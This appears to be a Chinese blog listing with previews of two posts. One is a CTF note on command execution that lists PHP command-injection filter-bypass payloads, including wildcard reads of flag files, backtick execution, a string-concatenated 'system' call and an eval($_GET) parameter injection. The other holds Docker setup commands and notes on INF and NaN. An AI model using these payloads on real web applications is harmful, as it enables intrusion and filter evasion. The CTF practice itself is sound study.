blog

命令执行

flag被过滤：system('tac fla*'); system被过滤：echo `tac fla*` 拼接法：?c=$a=sys;$b=tem;$c=$a.$b;$c("tac fla*"); 再传参：?c=eval($_GET[1]);&1=system("tac flag.php"); 利

2025-06-08

ctf

命令执行

随记

docker部署 sudo apt update apt install docker apt install docker-compose cd sudo docker-compose up - d INF：表示“无穷大”，通常在除以零的操作中出现，例如1.0/0.0 NaN：表示“不是一个数字”